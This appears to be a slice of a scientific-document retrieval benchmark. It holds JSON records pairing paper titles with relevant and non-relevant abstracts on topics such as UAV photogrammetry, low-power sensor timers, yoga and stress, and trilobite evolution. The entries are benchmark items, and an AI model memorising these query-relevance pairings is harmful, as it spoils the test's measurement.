"text": "The availability of high-resolution Digital Surface Models of coastal environments is of increasing interest for scientists involved in the study of the coastal system processes. Among the range of terrestrial and aerial methods available to produce such a dataset, this study tests the utility of the Structure from Motion (SfM) approach to low-altitude aerial imageries collected by Unmanned Aerial Vehicle (UAV). The SfM image-based approach was selected whilst searching for a rapid, inexpensive, and highly automated method, able to produce 3D information from unstructured aerial images. In particular, it was used to generate a dense point cloud and successively a high-resolution Digital Surface Models (DSM) of a beach dune system in Marina di Ravenna (Italy). The quality of the elevation dataset produced by the UAV-SfM was initially evaluated by comparison with point cloud generated by a Terrestrial Laser Scanning (TLS) surveys. Such a comparison served to highlight an average difference in the vertical values of 0.05 m (RMS = 0.19 m). However, although the points cloud comparison is the best approach to investigate the absolute or relative correspondence between UAV and TLS OPEN ACCESS Remote Sens. 2013, 5 6881 methods, the assessment of geomorphic features is usually based on multi-temporal surfaces analysis, where an interpolation process is required. DSMs were therefore generated from UAV and TLS points clouds and vertical absolute accuracies assessed by comparison with a Global Navigation Satellite System (GNSS) survey. The vertical comparison of UAV and TLS DSMs with respect to GNSS measurements pointed out an average distance at cm-level (RMS = 0.011 m). The successive point by point direct comparison between UAV and TLS elevations show a very small average distance, 0.015 m, with RMS = 0.220 m. Larger values are encountered in areas where sudden changes in topography are present. The UAV-based approach was demonstrated to be a straightforward one and accuracy of the vertical dataset was comparable with results obtained by TLS technology.",
"title": ""
}
] | scidocsrr |
de19ac7723243947167a0532de5f142a | A Sub-nW Multi-stage Temperature Compensated Timer for Ultra-Low-Power Sensor Nodes | [
{
"docid": "bb542460bf9196ef1905cecdce252bf3",
"text": "Wireless sensor nodes have many compelling applications such as smart buildings, medical implants, and surveillance systems. However, existing devices are bulky, measuring >;1cm3, and they are hampered by short lifetimes and fail to realize the “smart dust” vision of [1]. Smart dust requires a mm3-scale, wireless sensor node with perpetual energy harvesting. Recently two application-specific implantable microsystems [2][3] demonstrated the potential of a mm3-scale system in medical applications. However, [3] is not programmable and [2] lacks a method for re-programming or re-synchronizing once encapsulated. Other practical issues remain unaddressed, such as a means to protect the battery during the time period between system assembly and deployment and the need for flexible design to enable use in multiple application domains.",
"title": ""
}
] | [
{
"docid": "b85a6286ca2fb14a9255c9d70c677de3",
"text": "0140-3664/$ see front matter 2013 Elsevier B.V. All rights reserved. http://dx.doi.org/10.1016/j.comcom.2013.01.009 q The research leading to these results has been conducted in the SAIL project and received funding from the European Community’s Seventh Framework Program (FP7/2007-2013) under Grant Agreement No. 257448. ⇑ Corresponding author. Tel.: +49 5251 60 5385; fax: +49 5251 60 5377. E-mail addresses: cdannewitz@upb.de (C. Dannewitz), Dirk.Kutscher@neclab.eu (D. Kutscher), Borje.Ohlman@ericsson.com (B. Ohlman), stephen.farrell@cs.tcd.ie (S. Farrell), bengta@sics.se (B. Ahlgren), hkarl@upb.de (H. Karl). 1 <http://www.cisco.com/web/solutions/sp/vni/vni_mobile_forecast_highlights/ index.html>. Christian Dannewitz , Dirk Kutscher b,⇑, Börje Ohlman , Stephen Farrell , Bengt Ahlgren , Holger Karl a",
"title": ""
},
{
"docid": "4f84d3a504cf7b004a414346bb19fa94",
"text": "Abstract—The electric power supplied by a photovoltaic power generation systems depends on the solar irradiation and temperature. The PV system can supply the maximum power to the load at a particular operating point which is generally called as maximum power point (MPP), at which the entire PV system operates with maximum efficiency and produces its maximum power. Hence, a Maximum power point tracking (MPPT) methods are used to maximize the PV array output power by tracking continuously the maximum power point. The proposed MPPT controller is designed for 10kW solar PV system installed at Cape Institute of Technology. This paper presents the fuzzy logic based MPPT algorithm. However, instead of one type of membership function, different structures of fuzzy membership functions are used in the FLC design. The proposed controller is combined with the system and the results are obtained for each membership functions in Matlab/Simulink environment. Simulation results are decided that which membership function is more suitable for this system.",
"title": ""
},
{
"docid": "890f459384ea47a8915a60c19a3320e3",
"text": "Product ads are a popular form of search advertizing offered by major search engines, including Yahoo, Google and Bing. Unlike traditional search ads, product ads include structured product specifications, which allow search engine providers to perform better keyword-based ad retrieval. However, the level of completeness of the product specifications varies and strongly influences the performance of ad retrieval. On the other hand, online shops are increasing adopting semantic markup languages such as Microformats, RDFa and Microdata, to annotate their content, making large amounts of product description data publicly available. In this paper, we present an approach for enriching product ads with structured data extracted from thousands of online shops offering Microdata annotations. In our approach we use structured product ads as supervision for training feature extraction models able to extract attribute-value pairs from unstructured product descriptions. We use these features to identify matching products across different online shops and enrich product ads with the extracted data. Our evaluation on three product categories related to electronics show promising results in terms of enriching product ads with useful product data.",
"title": ""
},
{
"docid": "f4dc67d810d5f104f91c8724630992cf",
"text": "Apoptosis is deregulated in many cancers, making it difficult to kill tumours. Drugs that restore the normal apoptotic pathways have the potential for effectively treating cancers that depend on aberrations of the apoptotic pathway to stay alive. Apoptosis targets that are currently being explored for cancer drug discovery include the tumour-necrosis factor (TNF)-related apoptosis-inducing ligand (TRAIL) receptors, the BCL2 family of anti-apoptotic proteins, inhibitor of apoptosis (IAP) proteins and MDM2.",
"title": ""
},
{
"docid": "2579fe676b498cee60af8bda22d75e2e",
"text": "Only one late period is allowed for this homework (11:59pm 1/26). Submission instructions: These questions require thought but do not require long answers. Please be as concise as possible. You should submit your answers as a writeup in PDF format via GradeScope and code via the Snap submission site. Submitting writeup: Prepare answers to the homework questions into a single PDF file and submit it via http://gradescope.com. Make sure that the answer to each question is on a separate page. This means you should submit a 15-page PDF (1 page for the cover sheet, 1 page for the answers to question 1, 5 pages for answers to question 2, 3 pages for question 3, and 5 pages for question 4). On top of each page write the number of the question you are answering. Please find the cover sheet and the recommended templates located here: Not including the cover sheet in your submission will result in a 2-point penalty. Put all the code for a single question into a single file and upload it. Questions 1 MapReduce (25 pts) [Jeff/Sameep/Ivaylo] Write a MapReduce program in Hadoop that implements a simple \" People You Might Know \" social network friendship recommendation algorithm. The key idea is that if two people have a lot of mutual friends, then the system should recommend that they connect with each other.",
"title": ""
},
{
"docid": "e8f424ee75011e7cf9c2c3cbf5ea5037",
"text": "BACKGROUND\nEmotional distress is an increasing public health problem and Hatha yoga has been claimed to induce stress reduction and empowerment in practicing subjects. We aimed to evaluate potential effects of Iyengar Hatha yoga on perceived stress and associated psychological outcomes in mentally distressed women.\n\n\nMATERIAL/METHODS\nA controlled prospective non-randomized study was conducted in 24 self-referred female subjects (mean age 37.9+/-7.3 years) who perceived themselves as emotionally distressed. Subjects were offered participation in one of two subsequential 3-months yoga programs. Group 1 (n=16) participated in the first class, group 2 (n=8) served as a waiting list control. During the yoga course, subjects attended two-weekly 90-min Iyengar yoga classes. Outcome was assessed on entry and after 3 months by Cohen Perceived Stress Scale, State-Trait Anxiety Inventory, Profile of Mood States, CESD-Depression Scale, Bf-S/Bf-S' Well-Being Scales, Freiburg Complaint List and ratings of physical well-being. Salivary cortisol levels were measured before and after an evening yoga class in a second sample.\n\n\nRESULTS\nCompared to waiting-list, women who participated in the yoga-training demonstrated pronounced and significant improvements in perceived stress (P<0.02), State and Trait Anxiety (P<0.02 and P<0.01, respectively), well-being (P<0.01), vigor (P<0.02), fatigue (P<0.02) and depression (P<0.05). Physical well-being also increased (P<0.01), and those subjects suffering from headache or back pain reported marked pain relief. Salivary cortisol decreased significantly after participation in a yoga class (P<0.05).\n\n\nCONCLUSIONS\nWomen suffering from mental distress participating in a 3-month Iyengar yoga class show significant improvements on measures of stress and psychological outcomes. Further investigation of yoga with respect to prevention and treatment of stress-related disease and of underlying mechanism is warranted.",
"title": ""
},
{
"docid": "756b25456494b3ece9b240ba3957f91c",
"text": "In this paper we introduce the task of fact checking, i.e. the assessment of the truthfulness of a claim. The task is commonly performed manually by journalists verifying the claims made by public figures. Furthermore, ordinary citizens need to assess the truthfulness of the increasing volume of statements they consume. Thus, developing fact checking systems is likely to be of use to various members of society. We first define the task and detail the construction of a publicly available dataset using statements fact-checked by journalists available online. Then, we discuss baseline approaches for the task and the challenges that need to be addressed. Finally, we discuss how fact checking relates to mainstream natural language processing tasks and can stimulate further research.",
"title": ""
},
{
"docid": "941dc605dab6cf9bfe89bedb2b4f00a3",
"text": "Word boundary detection in continuous speech is very common and important problem in speech synthesis and recognition. Several researches are open on this field. Since there is no sign of start of the word, end of the word and number of words in the spoken utterance of any natural language, one must study the intonation pattern of a particular language. In this paper an algorithm is proposed to detect word boundaries in continuous speech of Hindi language. A careful study of the intonation pattern of Hindi language has been done. Based on this study it is observed that, there are several suprasegmental parameters of speech signal such as pitch, F0 fundamental frequency, duration, intensity, and pause, which can play important role in finding some clues to detect the start and the end of the word from the spoken utterance of Hindi Language. The proposed algorithm is based mainly on two prosodic parameters, pitch and intensity.",
"title": ""
},
{
"docid": "6d5998e5f0d5500493c7dc98c7fb28d9",
"text": "Coded structured light is an optical technique based on active stereovision which allows shape acquisition. By projecting a suitable set of light patterns onto the surface of an object and capturing images with a camera, a large number of correspondences can be found and 3D points can be reconstructed by means of triangulation. One-shot techniques are based on projecting an unique pattern so that moving objects can be measured. A major group of techniques in this field define coloured multi-slit or stripe patterns in order to obtain dense reconstructions. The former type of patterns is suitable for locating intensity peaks in the image while the latter is aimed to locate edges. In this paper, we present a new way to design coloured stripe patterns so that both intensity peaks and edges can be located without loss of accuracy and reducing the number of hue levels included in the pattern. The results obtained by the new pattern are quantitatively and qualitatively compared to similar techniques. These results also contribute to a comparison between the peak-based and edge-based reconstruction strategies. q 2005 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "ed0d234b961befcffab751f70f5c5fdb",
"text": "UNLABELLED\nA challenging aspect of managing patients on venoarterial extracorporeal membrane oxygenation (V-A ECMO) is a thorough understanding of the relationship between oxygenated blood from the ECMO circuit and blood being pumped from the patient's native heart. We present an adult V-A ECMO case report, which illustrates a unique encounter with the concept of \"dual circulations.\" Despite blood gases from the ECMO arterial line showing respiratory acidosis, this patient with cardiogenic shock demonstrated regional respiratory alkalosis when blood was sampled from the right radial arterial line. In response, a sample was obtained from the left radial arterial line, which mimicked the ECMO arterial blood but was dramatically different from the blood sampled from the right radial arterial line. A retrospective analysis of patient data revealed that the mismatch of blood gas values in this patient corresponded to an increased pulse pressure. Having three arterial blood sampling sites and data on the patient's pulse pressure provided a dynamic view of blood mixing and guided proper management, which contributed to a successful patient outcome that otherwise may not have occurred. As a result of this unique encounter, we created and distributed graphics representing the concept of \"dual circulations\" to facilitate the education of ECMO specialists at our institution.\n\n\nKEYWORDS\nECMO, education, cardiopulmonary bypass, cannulation.",
"title": ""
},
{
"docid": "5aed6d1cd0036384fd09a5c5a72a9020",
"text": "We propose a method of representing audience behavior through facial and body motions from a single video stream, and use these features to predict the rating for feature-length movies. This is a very challenging problem as: i) the movie viewing environment is dark and contains views of people at different scales and viewpoints; ii) the duration of feature-length movies is long (80-120 mins) so tracking people uninterrupted for this length of time is still an unsolved problem; and iii) expressions and motions of audience members are subtle, short and sparse making labeling of activities unreliable. To circumvent these issues, we use an infrared illuminated test-bed to obtain a visually uniform input. We then utilize motion-history features which capture the subtle movements of a person within a pre-defined volume, and then form a group representation of the audience by a histogram of pair-wise correlations over a small-window of time. Using this group representation, we learn our movie rating classifier from crowd-sourced ratings collected by rottentomatoes.com and show our prediction capability on audiences from 30 movies across 250 subjects (> 50 hrs).",
"title": ""
},
{
"docid": "865ca372a2b073e672c535a94c04c2ad",
"text": "The work presented here involves the design of a Multi Layer Perceptron (MLP) based pattern classifier for recognition of handwritten Bangla digits using a 76 element feature vector. Bangla is the second most popular script and language in the Indian subcontinent and the fifth most popular language in the world. The feature set developed for representing handwritten Bangla numerals here includes 24 shadow features, 16 centroid features and 36 longest-run features. On experimentation with a database of 6000 samples, the technique yields an average recognition rate of 96.67% evaluated after three-fold cross validation of results. It is useful for applications related to OCR of handwritten Bangla Digit and can also be extended to include OCR of handwritten characters of Bangla alphabet.",
"title": ""
},
{
"docid": "3188d901ab997dcabc795ad3da6af659",
"text": "This paper is about detecting incorrect arcs in a dependency parse for sentences that contain grammar mistakes. Pruning these arcs results in well-formed parse fragments that can still be useful for downstream applications. We propose two automatic methods that jointly parse the ungrammatical sentence and prune the incorrect arcs: a parser retrained on a parallel corpus of ungrammatical sentences with their corrections, and a sequence-to-sequence method. Experimental results show that the proposed strategies are promising for detecting incorrect syntactic dependencies as well as incorrect semantic dependencies.",
"title": ""
},
{
"docid": "b2ad81e0c7e352dac4caea559ac675bb",
"text": "A linearly polarized miniaturized printed dipole antenna with novel half bowtie radiating arm is presented for wireless applications including the 2.4 GHz ISM band. This design is approximately 0.363 λ in length at central frequency of 2.97 GHz. An integrated balun with inductive transitions is employed for wideband impedance matching without changing the geometry of radiating arms. This half bowtie dipole antenna displays 47% bandwidth, and a simulated efficiency of over 90% with miniature size. The radiation patterns are largely omnidirectional and display a useful level of measured gain across the impedance bandwidth. The size and performance of the miniaturized half bowtie dipole antenna is compared with similar reduced size antennas with respect to their overall footprint, substrate dielectric constant, frequency of operation and impedance bandwidth. This half bowtie design in this communication outperforms the reference antennas in virtually all categories.",
"title": ""
},
{
"docid": "7fc35d2bb27fb35b5585aad8601a0cbd",
"text": "We introduce Anita: a flexible and intelligent Text Adaptation tool for web content that provides Text Simplification and Text Enhancement modules. Anita’s simplification module features a state-of-the-art system that adapts texts according to the needs of individual users, and its enhancement module allows the user to search for a word’s definitions, synonyms, translations, and visual cues through related images. These utilities are brought together in an easy-to-use interface of a freely available web browser extension.",
"title": ""
},
{
"docid": "319ba1d449d2b65c5c58b5cc0fdbed67",
"text": "This paper introduces a new technology and tools from the field of text-based information retrieval. The authors have developed – a fingerprint-based method for a highly efficient near similarity search, and – an application of this method to identify plagiarized passages in large document collections. The contribution of our work is twofold. Firstly, it is a search technology that enables a new quality for the comparative analysis of complex and large scientific texts. Secondly, this technology gives rise to a new class of tools for plagiarism analysis, since the comparison of entire books becomes computationally feasible. The paper is organized as follows. Section 1 gives an introduction to plagiarism delicts and related detection methods, Section 2 outlines the method of fuzzy-fingerprints as a means for near similarity search, and Section 3 shows our methods in action: It gives examples for near similarity search as well as plagiarism detection and discusses results from a comprehensive performance analyses. 1 Plagiarism Analysis Plagiarism is the act of claiming to be the author of material that someone else actually wrote (Encyclopædia Britannica 2005), and, with the ubiquitousness",
"title": ""
},
{
"docid": "76eef8117ac0bc5dbb0529477d10108d",
"text": "Most existing switched-capacitor (SC) DC-DC converters only offer a few voltage conversion ratios (VCRs), leading to significant efficiency fluctuations under wide input/output dynamics (e.g. up to 30% in [1]). Consequently, systematic SC DC-DC converters with fine-grained VCRs (FVCRs) become attractive to achieve high efficiency over a wide operating range. Both the Recursive SC (RSC) [2,3] and Negator-based SC (NSC) [4] topologies offer systematic FVCR generations with high conductance, but their binary-switching nature fundamentally results in considerable parasitic loss. In bulk CMOS, the restriction of using low-parasitic MIM capacitors for high efficiency ultimately limits their achievable power density to <1mW/mm2. This work reports a fully integrated fine-grained buck-boost SC DC-DC converter with 24 VCRs. It features an algorithmic voltage-feed-in (AVFI) topology to systematically generate any arbitrary buck-boost rational ratio with optimal conduction loss while achieving the lowest parasitic loss compared with [2,4]. With 10 main SC cells (MCs) and 10 auxiliary SC cells (ACs) controlled by the proposed reference-selective bootstrapping driver (RSBD) for wide-range efficient buck-boost operations, the AVFI converter in 65nm bulk CMOS achieves a peak efficiency of 84.1% at a power density of 13.2mW/mm2 over a wide range of input (0.22 to 2.4V) and output (0.85 to 1.2V).",
"title": ""
},
{
"docid": "5f8a8117ff153528518713d66c876228",
"text": "Certain human talents, such as musical ability, have been associated with left-right differences in brain structure and function. In vivo magnetic resonance morphometry of the brain in musicians was used to measure the anatomical asymmetry of the planum temporale, a brain area containing auditory association cortex and previously shown to be a marker of structural and functional asymmetry. Musicians with perfect pitch revealed stronger leftward planum temporale asymmetry than nonmusicians or musicians without perfect pitch. The results indicate that outstanding musical ability is associated with increased leftward asymmetry of cortex subserving music-related functions.",
"title": ""
},
{
"docid": "66a6e9bbdd461fa85a0a09ec1ceb2031",
"text": "BACKGROUND\nConverging evidence indicates a functional disruption in the neural systems for reading in adults with dyslexia. We examined brain activation patterns in dyslexic and nonimpaired children during pseudoword and real-word reading tasks that required phonologic analysis (i.e., tapped the problems experienced by dyslexic children in sounding out words).\n\n\nMETHODS\nWe used functional magnetic resonance imaging (fMRI) to study 144 right-handed children, 70 dyslexic readers, and 74 nonimpaired readers as they read pseudowords and real words.\n\n\nRESULTS\nChildren with dyslexia demonstrated a disruption in neural systems for reading involving posterior brain regions, including parietotemporal sites and sites in the occipitotemporal area. Reading skill was positively correlated with the magnitude of activation in the left occipitotemporal region. Activation in the left and right inferior frontal gyri was greater in older compared with younger dyslexic children.\n\n\nCONCLUSIONS\nThese findings provide neurobiological evidence of an underlying disruption in the neural systems for reading in children with dyslexia and indicate that it is evident at a young age. The locus of the disruption places childhood dyslexia within the same neurobiological framework as dyslexia, and acquired alexia, occurring in adults.",
"title": ""
}
] | scidocsrr |
00942a423d13cb0a425459dd34a4ab74 | Hashtag Recommendation Using Dirichlet Process Mixture Models Incorporating Types of Hashtags | [
{
"docid": "d9615510bb6cf2cb2d8089be402c193c",
"text": "Tagging plays an important role in many recent websites. Recommender systems can help to suggest a user the tags he might want to use for tagging a specific item. Factorization models based on the Tucker Decomposition (TD) model have been shown to provide high quality tag recommendations outperforming other approaches like PageRank, FolkRank, collaborative filtering, etc. The problem with TD models is the cubic core tensor resulting in a cubic runtime in the factorization dimension for prediction and learning.\n In this paper, we present the factorization model PITF (Pairwise Interaction Tensor Factorization) which is a special case of the TD model with linear runtime both for learning and prediction. PITF explicitly models the pairwise interactions between users, items and tags. The model is learned with an adaption of the Bayesian personalized ranking (BPR) criterion which originally has been introduced for item recommendation. Empirically, we show on real world datasets that this model outperforms TD largely in runtime and even can achieve better prediction quality. Besides our lab experiments, PITF has also won the ECML/PKDD Discovery Challenge 2009 for graph-based tag recommendation.",
"title": ""
}
] | [
{
"docid": "030c8aeb4e365bfd2fdab710f8c9f598",
"text": "By combining linear graph theory with the principle of virtual work, a dynamic formulation is obtained that extends graph-theoretic modelling methods to the analysis of exible multibody systems. The system is represented by a linear graph, in which nodes represent reference frames on rigid and exible bodies, and edges represent components that connect these frames. By selecting a spanning tree for the graph, the analyst can choose the set of coordinates appearing in the nal system of equations. This set can include absolute, joint, or elastic coordinates, or some combination thereof. If desired, all non-working constraint forces and torques can be automatically eliminated from the dynamic equations by exploiting the properties of virtual work. The formulation has been implemented in a computer program, DynaFlex, that generates the equations of motion in symbolic form. Three examples are presented to demonstrate the application of the formulation, and to validate the symbolic computer implementation.",
"title": ""
},
{
"docid": "7abdd1fc5f2a8c5b7b19a6a30eadad0a",
"text": "This Paper investigate action recognition by using Extreme Gradient Boosting (XGBoost). XGBoost is a supervised classification technique using an ensemble of decision trees. In this study, we also compare the performance of Xboost using another machine learning techniques Support Vector Machine (SVM) and Naive Bayes (NB). The experimental study on the human action dataset shows that XGBoost better as compared to SVM and NB in classification accuracy. Although takes more computational time the XGBoost performs good classification on action recognition.",
"title": ""
},
{
"docid": "072bec0456cb46292b0e6f4e065c3163",
"text": "Vector representations and vector space modeling (VSM) play a central role in modern machine learning. We propose a novel approach to ‘vector similarity searching’ over dense semantic representations of words and documents that can be deployed on top of traditional inverted-index-based fulltext engines, taking advantage of their robustness, stability, scalability and ubiquity. We show that this approach allows the indexing and querying of dense vectors in text domains. This opens up exciting avenues for major efficiency gains, along with simpler deployment, scaling and monitoring. The end result is a fast and scalable vector database with a tunable tradeoff between vector search performance and quality, backed by a standard fulltext engine such as Elasticsearch. We empirically demonstrate its querying performance and quality by applying this solution to the task of semantic searching over a dense vector representation of the entire English Wikipedia.",
"title": ""
},
{
"docid": "056f5179fa5c0cdea06d29d22a756086",
"text": "Finding solution values for unknowns in Boolean equations was a principal reasoning mode in the Algebra of Logic of the 19th century. Schröder investigated it as Auflösungsproblem (solution problem). It is closely related to the modern notion of Boolean unification. Today it is commonly presented in an algebraic setting, but seems potentially useful also in knowledge representation based on predicate logic. We show that it can be modeled on the basis of first-order logic extended by secondorder quantification. A wealth of classical results transfers, foundations for algorithms unfold, and connections with second-order quantifier elimination and Craig interpolation show up. Although for first-order inputs the set of solutions is recursively enumerable, the development of constructive methods remains a challenge. We identify some cases that allow constructions, most of them based on Craig interpolation, and show a method to take vocabulary restrictions on solution components into account. Revision: June 26, 2017",
"title": ""
},
{
"docid": "67c3e39341c5522b309016b2bbb6a64a",
"text": "Process discovery, i.e., learning process models from event logs, has attracted the attention of researchers and practitioners. Today, there exists a wide variety of process mining techniques that are able to discover the control-flow of a process based on event data. These techniques are able to identify decision points, but do not analyze data flow to find rules explaining why individual cases take a particular path. Fortunately, recent advances in conformance checking can be used to align an event log with data and a process model with decision points. These alignments can be used to generate a well-defined classification problem per decision point. This way data flow and guards can be discovered and added to the process model.",
"title": ""
},
{
"docid": "d9a71b75cae2a72dd187b085018b285f",
"text": "The most important part of the active power filters is generating of gate signal for inverters. This paper presents Single Phase Application of Space Vector Pulse Width Modulation for shunt active power filters. In conventional SVPWM, all of the phase's currents are controlled together, but in this method each of phase currents is controlled independently from the measured currents of other phases. In another word, this method prevents from influence of other phase's errors in the control of considered phase. In this method, the implementation of control logic will be simpler than the conventional SVPWM. For showing the performance of proposed method a typical system has been simulated by MATLAB/SIMULINK. At last, the results of proposed method are compared with the conventional SVPWM. The results show that proposed method have better performance in generating of the compensation current in active power filter.",
"title": ""
},
{
"docid": "8ca0edf4c51b0156c279fcbcb1941d2b",
"text": "The good fossil record of trilobite exoskeletal anatomy and ontogeny, coupled with information on their nonbiomineralized tissues, permits analysis of how the trilobite body was organized and developed, and the various evolutionary modifications of such patterning within the group. In several respects trilobite development and form appears comparable with that which may have characterized the ancestor of most or all euarthropods, giving studies of trilobite body organization special relevance in the light of recent advances in the understanding of arthropod evolution and development. The Cambrian diversification of trilobites displayed modifications in the patterning of the trunk region comparable with those seen among the closest relatives of Trilobita. In contrast, the Ordovician diversification of trilobites, although contributing greatly to the overall diversity within the clade, did so within a narrower range of trunk conditions. Trilobite evolution is consistent with an increased premium on effective enrollment and protective strategies, and with an evolutionary trade-off between the flexibility to vary the number of trunk segments and the ability to regionalize portions of the trunk. 401 A nn u. R ev . E ar th P la ne t. Sc i. 20 07 .3 5: 40 143 4. D ow nl oa de d fr om a rj ou rn al s. an nu al re vi ew s. or g by U N IV E R SI T Y O F C A L IF O R N IA R IV E R SI D E L IB R A R Y o n 05 /0 2/ 07 . F or p er so na l u se o nl y. ANRV309-EA35-14 ARI 20 March 2007 15:54 Cephalon: the anteriormost or head division of the trilobite body composed of a set of conjoined segments whose identity is expressed axially Thorax: the central portion of the trilobite body containing freely articulating trunk segments Pygidium: the posterior tergite of the trilobite exoskeleton containing conjoined segments INTRODUCTION The rich record of the diversity and development of the trilobite exoskeleton (along with information on the geological occurrence, nonbiomineralized tissues, and associated trace fossils of trilobites) provides the best history of any Paleozoic arthropod group. The retention of features that may have characterized the most recent common ancestor of all living arthropods, which have been lost or obscured in most living forms, provides insights into the nature of the evolutionary radiation of the most diverse metazoan phylum alive today. Studies of phylogenetic stem-group taxa, of which Trilobita provide a prominent example, have special significance in the light of renewed interest in arthropod evolution prompted by comparative developmental genetics. Although we cannot hope to dissect the molecular controls operative within trilobites, the evolutionary developmental biology (evo-devo) approach permits a fresh perspective from which to examine the contributions that paleontology can make to evolutionary biology, which, in the context of the overall evolutionary history of Trilobita, is the subject of this review. TRILOBITES: BODY PLAN AND ONTOGENY Trilobites were a group of marine arthropods that appeared in the fossil record during the early Cambrian approximately 520 Ma and have not been reported from rocks younger than the close of the Permian, approximately 250 Ma. Roughly 15,000 species have been described to date, and although analysis of the occurrence of trilobite genera suggests that the known record is quite complete (Foote & Sepkoski 1999), many new species and genera continue to be established each year. The known diversity of trilobites results from their strongly biomineralized exoskeletons, made of two layers of low magnesium calcite, which was markedly more durable than the sclerites of most other arthropods. Because the exoskeleton was rich in morphological characters and was the only body structure preserved in the vast majority of specimens, skeletal form has figured prominently in the biological interpretation of trilobites.",
"title": ""
},
{
"docid": "faf4eeaaf3e8516ac65543c0bc5e50d6",
"text": "Service Oriented Architecture facilitates more feature as compared to legacy architecture which makes this architecture widely accepted by the industry. Service oriented architecture provides feature like reusability, composability, distributed deployment. Service of SOA is governed by SOA governance board in which they provide approval to create the services and also provide space to expose the particular services. Sometime many services are kept in a repository which creates service identification issue. Service identification is one of the most critical aspects in service oriented architecture. The services must be defined or identified keeping reuse and usage in different business contexts in mind. Rigorous review of Identified service should be done prior to development of the services. Identification of the authenticated service is challenging to development teams due to several reasons such as lack of business process documentation, lack of expert analyst, and lack of business executive involvement, lack of reuse of services, lack of right decision to choose the appropriate service. In some of the cases we have replica of same service exist, which creates difficulties in service identification. Existing design approaches of SOA doesn't take full advantage whereas proposed model is compatible more advantageous and increase the performance of the services. This paper proposes a model which will help in clustering the service repository based on service functionality. Service identification will be easy if we follow distributed repository based on functionality for our services. Generally in case of web services where service response time should be minimal, searching in whole repository delays response time. The proposed model will reduce the response time of the services and will also helpful in identifying the correct services within the specified time.",
"title": ""
},
{
"docid": "25921de89de837e2bcd2a815ec181564",
"text": "Satellite-based Global Positioning Systems (GPS) have enabled a variety of location-based services such as navigation systems, and become increasingly popular and important in our everyday life. However, GPS does not work well in indoor environments where walls, floors and other construction objects greatly attenuate satellite signals. In this paper, we propose an Indoor Positioning System (IPS) based on widely deployed indoor WiFi systems. Our system uses not only the Received Signal Strength (RSS) values measured at the current location but also the previous location information to determine the current location of a mobile user. We have conducted a large number of experiments in the Schorr Center of the University of Nebraska-Lincoln, and our experiment results show that our proposed system outperforms all other WiFi-based RSS IPSs in the comparison, and is 5% more accurate on average than others. iii ACKNOWLEDGMENTS Firstly, I would like to express my heartfelt gratitude to my advisor and committee chair, Professor Lisong Xu and the co-advisor Professor Zhigang Shen for their constant encouragement and guidance throughout the course of my master's study and all the stages of the writing of this thesis. Without their consistent and illuminating instruction, this thesis work could not have reached its present form. Their technical and editorial advice and infinite patience were essential for the completion of this thesis. I feel privileged to have had the opportunity to study under them. I thank Professor Ziguo Zhong and Professor Mehmet Vuran for serving on my Master's Thesis defense committee, and their involvement has greatly improved and clarified this work. I specially thank Prof Ziguo Zhong again, since his support has always been very generous in both time and research resources. I thank all the CSE staff and friends, for their friendship and for all the memorable times in UNL. I would like to thank everyone who has helped me along the way. At last, I give my deepest thanks go to my parents for their self-giving love and support throughout my life.",
"title": ""
},
{
"docid": "61d0454725e14defb8a4f142f5b893c7",
"text": "Automated keyphrase extraction is a fundamental textual information processing task concerned with the selection of representative phrases from a document that summarize its content. This work presents a novel unsupervised method for keyphrase extraction, whose main innovation is the use of local word embeddings (in particular GloVe vectors), i.e., embeddings trained from the single document under consideration. We argue that such local representation of words and keyphrases are able to accurately capture their semantics in the context of the document they are part of, and therefore can help in improving keyphrase extraction quality. Empirical results offer evidence that indeed local representations lead to better keyphrase extraction results compared to both embeddings trained on very large third corpora or larger corpora consisting of several documents of the same scientific field and to other state-of-the-art unsupervised keyphrase extraction methods.",
"title": ""
},
{
"docid": "ad8a727d0e3bd11cd972373451b90fe7",
"text": "The loss functions of deep neural networks are complex and their geometric properties are not well understood. We show that the optima of these complex loss functions are in fact connected by simple curves over which training and test accuracy are nearly constant. We introduce a training procedure to discover these high-accuracy pathways between modes. Inspired by this new geometric insight, we also propose a new ensembling method entitled Fast Geometric Ensembling (FGE). Using FGE we can train high-performing ensembles in the time required to train a single model. We achieve improved performance compared to the recent state-of-the-art Snapshot Ensembles, on CIFAR-10, CIFAR-100, and ImageNet.",
"title": ""
},
{
"docid": "9a427dae8e47e6004a45a19a2283326f",
"text": "This article describes the challenges that women and women of color face in their quest to achieve and perform in leadership roles in work settings. We discuss the barriers that women encounter and specifically address the dimensions of gender and race and their impact on leadership. We identify the factors associated with gender evaluations of leaders and the stereotypes and other challenges faced by White women and women of color. We use ideas concerning identity and the intersection of multiple identities to understand the way in which gender mediates and shapes the experience of women in the workplace. We conclude with suggestions for research and theory development that may more fully capture the complex experience of women who serve as leaders.",
"title": ""
},
{
"docid": "88c713e4358ab9fc9a6345aeed2105a9",
"text": "The train scheduling problem is an integer programming problem known to be NP hard. In practice such a problem is often required to be solved in real time, hence a quick heuristic that allows a good feasible solution to be obtained in a predetermined and finite number of steps is most desired. We propose an algorithm which is based on local optimality criteria in the event of a potential crossing conflict. The suboptimal but feasible solution can be obtained very quickly in polynomial time. The model can also be generalized to cater for the possibility of overtaking when the trains have different speed. We also furnish a complexity analysis to show the NP-completeness of the problem. Simulation results for two non-trivial examples are presented to demonstrate the effectiveness of the proposed algorithm.",
"title": ""
},
{
"docid": "a59c73927c732521cfb58385b58fab32",
"text": "BACKGROUND\nFrequent use of Facebook and other social networks is thought to be associated with certain behavioral changes, and some authors have expressed concerns about its possible detrimental effect on mental health. In this work, we investigated the relationship between social networking and depression indicators in adolescent population.\n\n\nSUBJECTS AND METHODS\nTotal of 160 high school students were interviewed using an anonymous, structured questionnaire and Back Depression Inventory - second edition (BDI-II-II). Apart from BDI-II-II, students were asked to provide the data for height and weight, gender, average daily time spent on social networking sites, average time spent watching TV, and sleep duration in a 24-hour period.\n\n\nRESULTS\nAverage BDI-II-II score was 8.19 (SD=5.86). Average daily time spent on social networking was 1.86 h (SD=2.08 h), and average time spent watching TV was 2.44 h (SD=1.74 h). Average body mass index of participants was 21.84 (SD=3.55) and average sleep duration was 7.37 (SD=1.82). BDI-II-II score indicated minimal depression in 104 students, mild depression in 46 students, and moderate depression in 10 students. Statistically significant positive correlation (p<0.05, R=0.15) was found between BDI-II-II score and the time spent on social networking.\n\n\nCONCLUSIONS\nOur results indicate that online social networking is related to depression. Additional research is required to determine the possible causal nature of this relationship.",
"title": ""
},
{
"docid": "7c8776729f9e734133d5d09483080435",
